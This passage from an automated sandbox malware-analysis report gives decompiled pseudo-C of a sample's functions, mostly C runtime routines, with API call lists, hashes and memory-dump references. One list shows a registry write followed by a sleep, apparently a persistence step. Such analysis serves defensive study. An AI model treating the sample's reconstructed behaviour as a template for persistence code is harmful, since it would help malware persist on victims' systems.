                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74119DB1A40709EBD7629F50DD49BAA77E0EB48704F00C218F6198BA80C7B4E8D4DF80
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C248,00000000,000F003F,00000000), ref: 02522AFE
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02522B0C
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,-00000208,00000000,00000001,?,?), ref: 02522B2F
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 02522B39
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 02522B44
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction ID: 96306793b77c8d5d2feb257dac89c3fcd384f87e5ed548b905dbdd7e893e6649
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7210075A04209EFEB18DFE4C949BAEBBB5FB44301F108258EA01E72C1D7789A44CB55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                          			E00106BC3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                                                                                                          				LONG* _t21;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				LONG* _t33;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t35 = __eflags;
                                                                                                                                                                                                                                                                                          				_t29 = __edx;
                                                                                                                                                                                                                                                                                          				_t25 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                                                                                          				_push(0x1144d0);
                                                                                                                                                                                                                                                                                          				E00108F60(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                          				_t31 = E0010756D(__ebx, __edx, _t35);
                                                                                                                                                                                                                                                                                          				_t15 =  *0x159588; // 0xfffffffe
                                                                                                                                                                                                                                                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                                          					E0010A67E(_t25, _t31, 0xd);
                                                                                                                                                                                                                                                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                                                                                                          					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                                                                                                          					__eflags = _t33 -  *0x159490; // 0x2541608
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t33;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = InterlockedDecrement(_t33);
                                                                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _t33 - 0x159068;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									E00105DE2(_t33);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t21 =  *0x159490; // 0x2541608
                                                                                                                                                                                                                                                                                          						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                                                                                                          						_t33 =  *0x159490; // 0x2541608
                                                                                                                                                                                                                                                                                          						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                                                                                                          						InterlockedIncrement(_t33);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          					E00106C5E();
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t38 = _t33;
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_push(0x20);
                                                                                                                                                                                                                                                                                          					E001086D7(_t29, _t38);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E00108FA5(_t33);
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x00106bc3
                                                                                                                                                                                                                                                                                          0x00106bc3
                                                                                                                                                                                                                                                                                          0x00106bc3
                                                                                                                                                                                                                                                                                          0x00106bc3
                                                                                                                                                                                                                                                                                          0x00106bc5
                                                                                                                                                                                                                                                                                          0x00106bca
                                                                                                                                                                                                                                                                                          0x00106bd4
                                                                                                                                                                                                                                                                                          0x00106bd6
                                                                                                                                                                                                                                                                                          0x00106bde
                                                                                                                                                                                                                                                                                          0x00106bff
                                                                                                                                                                                                                                                                                          0x00106c05
                                                                                                                                                                                                                                                                                          0x00106c09
                                                                                                                                                                                                                                                                                          0x00106c0c
                                                                                                                                                                                                                                                                                          0x00106c0f
                                                                                                                                                                                                                                                                                          0x00106c15
                                                                                                                                                                                                                                                                                          0x00106c17
                                                                                                                                                                                                                                                                                          0x00106c19
                                                                                                                                                                                                                                                                                          0x00106c22
                                                                                                                                                                                                                                                                                          0x00106c24
                                                                                                                                                                                                                                                                                          0x00106c26
                                                                                                                                                                                                                                                                                          0x00106c2c
                                                                                                                                                                                                                                                                                          0x00106c2f
                                                                                                                                                                                                                                                                                          0x00106c34
                                                                                                                                                                                                                                                                                          0x00106c2c
                                                                                                                                                                                                                                                                                          0x00106c24
                                                                                                                                                                                                                                                                                          0x00106c35
                                                                                                                                                                                                                                                                                          0x00106c3a
                                                                                                                                                                                                                                                                                          0x00106c3d
                                                                                                                                                                                                                                                                                          0x00106c43
                                                                                                                                                                                                                                                                                          0x00106c47
                                                                                                                                                                                                                                                                                          0x00106c47
                                                                                                                                                                                                                                                                                          0x00106c4d
                                                                                                                                                                                                                                                                                          0x00106c54
                                                                                                                                                                                                                                                                                          0x00106be6
                                                                                                                                                                                                                                                                                          0x00106be6
                                                                                                                                                                                                                                                                                          0x00106be6
                                                                                                                                                                                                                                                                                          0x00106be9
                                                                                                                                                                                                                                                                                          0x00106beb
                                                                                                                                                                                                                                                                                          0x00106bed
                                                                                                                                                                                                                                                                                          0x00106bef
                                                                                                                                                                                                                                                                                          0x00106bf4
                                                                                                                                                                                                                                                                                          0x00106bfc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00106BCF
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __getptd_noexit.LIBCMT ref: 00107570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __amsg_exit.LIBCMT ref: 0010757D
                                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00106BEF
                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00106BFF
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00106C1C
                                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(02541608), ref: 00106C47
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4981673033661bfed535df1003362bd1f58d1149de0bc818c3ecdf3a816c57e1
                                                                                                                                                                                                                                                                                          • Instruction ID: ee5c0f7a2a0d620552dc8242bd795a50d2ddf024b07e8ec73857ae2c72c4a957
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4981673033661bfed535df1003362bd1f58d1149de0bc818c3ecdf3a816c57e1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2401F531E00725DBDB15AF649A0979D7360BF18715F144019F8E0ABAD0DBF4ADA1CBC2
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F47C0() {
                                                                                                                                                                                                                                                                                          				long _t7;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t11;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t13;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t15;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t13 = 0;
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t15 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					return _t13;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t7 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					_t11 = 0;
                                                                                                                                                                                                                                                                                          					while( *((intOrPtr*)(_t15 + 4)) != _t7) {
                                                                                                                                                                                                                                                                                          						_t11 = _t15;
                                                                                                                                                                                                                                                                                          						_t15 =  *((intOrPtr*)(_t15 + 8));
                                                                                                                                                                                                                                                                                          						if(_t15 != 0) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							return _t13;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t11 + 8)) =  *((intOrPtr*)(_t15 + 8));
                                                                                                                                                                                                                                                                                          						_t13 =  *_t15;
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *0x170c80 =  *((intOrPtr*)(_t15 + 8));
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						return  *_t15;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L9:
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000f47c7
                                                                                                                                                                                                                                                                                          0x000f47c9
                                                                                                                                                                                                                                                                                          0x000f47cf
                                                                                                                                                                                                                                                                                          0x000f47d7
                                                                                                                                                                                                                                                                                          0x000f4825
                                                                                                                                                                                                                                                                                          0x000f482a
                                                                                                                                                                                                                                                                                          0x000f4834
                                                                                                                                                                                                                                                                                          0x000f47d9
                                                                                                                                                                                                                                                                                          0x000f47d9
                                                                                                                                                                                                                                                                                          0x000f47df
                                                                                                                                                                                                                                                                                          0x000f47e1
                                                                                                                                                                                                                                                                                          0x000f47e6
                                                                                                                                                                                                                                                                                          0x000f47e8
                                                                                                                                                                                                                                                                                          0x000f47ed
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f47ef
                                                                                                                                                                                                                                                                                          0x000f47f4
                                                                                                                                                                                                                                                                                          0x000f47fe
                                                                                                                                                                                                                                                                                          0x000f47fe
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f47ed
                                                                                                                                                                                                                                                                                          0x000f4801
                                                                                                                                                                                                                                                                                          0x000f4820
                                                                                                                                                                                                                                                                                          0x000f4823
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4803
                                                                                                                                                                                                                                                                                          0x000f4806
                                                                                                                                                                                                                                                                                          0x000f4812
                                                                                                                                                                                                                                                                                          0x000f481c
                                                                                                                                                                                                                                                                                          0x000f481c
                                                                                                                                                                                                                                                                                          0x000f4801
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,?,000F56D9,?,?), ref: 000F47C9
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000F47D9
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000F47F4
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000F4812
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000F482A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2905768538-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 298957af2299aa7d799b30dd309c66a7da1e3e399496df80ef0c530d6f8209b8
                                                                                                                                                                                                                                                                                          • Instruction ID: 2e99dca18fb99c9262d8a9c7efe9600a8a51c40e8fe7466210920dbb03a4bd24
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298957af2299aa7d799b30dd309c66a7da1e3e399496df80ef0c530d6f8209b8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F014F35B40310CBC7A69B19FD4845A77F1EBCCB21315826AFD49D3A50C770A8C6DA91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E00107344(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t31 = __eflags;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                                          				_t20 = __ebx;
                                                                                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                                                                                          				_push(0x114510);
                                                                                                                                                                                                                                                                                          				E00108F60(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                          				_t28 = E0010756D(__ebx, __edx, _t31);
                                                                                                                                                                                                                                                                                          				_t12 =  *0x159588; // 0xfffffffe
                                                                                                                                                                                                                                                                                          				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					E0010A67E(_t20, _t26, 0xc);
                                                                                                                                                                                                                                                                                          					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                          					_t29 = _t28 + 0x6c;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t30 - 0x1c)) = E001072F7(_t29,  *0x1597d0);
                                                                                                                                                                                                                                                                                          					 *(_t30 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                          					E001073B1();
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t29 =  *((intOrPtr*)(E0010756D(_t20, __edx, _t33) + 0x6c));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t34 = _t29;
                                                                                                                                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                                                                                                                                          					_push(0x20);
                                                                                                                                                                                                                                                                                          					E001086D7(_t25, _t34);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E00108FA5(_t29);
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x00107344
                                                                                                                                                                                                                                                                                          0x00107344
                                                                                                                                                                                                                                                                                          0x00107344
                                                                                                                                                                                                                                                                                          0x00107344
                                                                                                                                                                                                                                                                                          0x00107344
                                                                                                                                                                                                                                                                                          0x00107346
                                                                                                                                                                                                                                                                                          0x0010734b
                                                                                                                                                                                                                                                                                          0x00107355
                                                                                                                                                                                                                                                                                          0x00107357
                                                                                                                                                                                                                                                                                          0x0010735f
                                                                                                                                                                                                                                                                                          0x00107383
                                                                                                                                                                                                                                                                                          0x00107385
                                                                                                                                                                                                                                                                                          0x0010738b
                                                                                                                                                                                                                                                                                          0x00107395
                                                                                                                                                                                                                                                                                          0x001073a0
                                                                                                                                                                                                                                                                                          0x001073a3
                                                                                                                                                                                                                                                                                          0x001073aa
                                                                                                                                                                                                                                                                                          0x00107361
                                                                                                                                                                                                                                                                                          0x00107361
                                                                                                                                                                                                                                                                                          0x00107365
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00107367
                                                                                                                                                                                                                                                                                          0x0010736c
                                                                                                                                                                                                                                                                                          0x0010736c
                                                                                                                                                                                                                                                                                          0x00107365
                                                                                                                                                                                                                                                                                          0x0010736f
                                                                                                                                                                                                                                                                                          0x00107371
                                                                                                                                                                                                                                                                                          0x00107373
                                                                                                                                                                                                                                                                                          0x00107375
                                                                                                                                                                                                                                                                                          0x0010737a
                                                                                                                                                                                                                                                                                          0x00107382

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00107350
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __getptd_noexit.LIBCMT ref: 00107570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __amsg_exit.LIBCMT ref: 0010757D
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00107367
                                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00107375
                                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00107385
                                                                                                                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00107399
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 220a49a65c806e7585711979e9fdd86bee0c7a9425a81007f6f0bdd99dea3b92
                                                                                                                                                                                                                                                                                          • Instruction ID: cce77ead2f6e937be19d7ebc796dc6cfaccc365536f47c39e224cccd55891086
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 220a49a65c806e7585711979e9fdd86bee0c7a9425a81007f6f0bdd99dea3b92
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19F09032E0C700DBEB21BBB4680675D76A0BF14B20F610109F8D06F6D2DFE46840AA56
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                                                                                          			E000F24C0(void* __ecx, signed int __edx, signed int _a4, struct HINSTANCE__* _a8, signed short _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t37;
                                                                                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                                                          				int _t60;
                                                                                                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				char* _t65;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t52 = __edx;
                                                                                                                                                                                                                                                                                          				_t45 = __ecx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FC48);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t65 = _t64 - 0x10;
                                                                                                                                                                                                                                                                                          				_t20 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t21 = _t20 ^ _t63;
                                                                                                                                                                                                                                                                                          				_v20 = _t21;
                                                                                                                                                                                                                                                                                          				_push(_t21);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t56 = 0;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t23 = lstrlenW(L"REGISTRY");
                                                                                                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                                                                                                          				_t59 = _t23 + 1;
                                                                                                                                                                                                                                                                                          				_t53 = (_t52 << 0x00000020 | _t59) << 1;
                                                                                                                                                                                                                                                                                          				_t60 = _t59 + _t59;
                                                                                                                                                                                                                                                                                          				_t26 = _t60 + 0x80000000;
                                                                                                                                                                                                                                                                                          				asm("adc edx, edi");
                                                                                                                                                                                                                                                                                          				_v28 = (_t52 << 0x00000020 | _t59) << 1;
                                                                                                                                                                                                                                                                                          				if(_t26 != 0 || _t26 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					_t27 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t60 > 0x400) {
                                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                                          						if((_t26 | 0xffffffff) - _t60 < 8) {
                                                                                                                                                                                                                                                                                          							_push(0x80070216);
                                                                                                                                                                                                                                                                                          							E000F1170(_t53);
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t10 = _t60 + 8; // 0x9
                                                                                                                                                                                                                                                                                          							_t37 = E00105E1C(_t53, _t56, _t60, _t10);
                                                                                                                                                                                                                                                                                          							_t65 =  &(_t65[4]);
                                                                                                                                                                                                                                                                                          							if(_t37 == _t56) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								 *_t37 = _t56;
                                                                                                                                                                                                                                                                                          								_t56 = _t37;
                                                                                                                                                                                                                                                                                          								_v24 = _t56;
                                                                                                                                                                                                                                                                                          								_t12 = _t37 + 8; // 0x8
                                                                                                                                                                                                                                                                                          								_t44 = _t12;
                                                                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t26 = E000F1030(_t45, _t53, _t60);
